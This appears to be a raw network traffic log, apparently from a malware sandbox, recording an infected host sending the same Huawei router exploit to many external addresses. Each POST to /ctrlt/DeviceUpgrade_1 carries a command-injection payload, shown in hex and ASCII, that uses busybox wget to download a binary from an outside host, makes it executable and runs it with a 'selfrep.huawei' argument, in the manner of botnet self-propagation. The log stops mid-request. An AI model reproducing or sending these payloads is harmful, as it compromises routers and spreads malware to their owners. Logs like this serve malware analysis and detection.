6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1376192.168.2.134627841.156.40.8937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559370995 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1377192.168.2.1334636157.134.162.18137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559396029 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1378192.168.2.133739841.52.109.15537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559669018 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1379192.168.2.135043441.86.29.24137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559694052 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1380192.168.2.1354438157.196.236.637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559716940 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1381192.168.2.135219841.79.79.18037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559745073 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1382192.168.2.134434438.138.48.19937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559763908 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1383192.168.2.134901241.146.60.7137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559815884 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1384192.168.2.135471041.155.70.6137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559833050 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1385192.168.2.1348538219.225.118.2037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559861898 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1386192.168.2.1340046184.78.137.2737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559892893 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
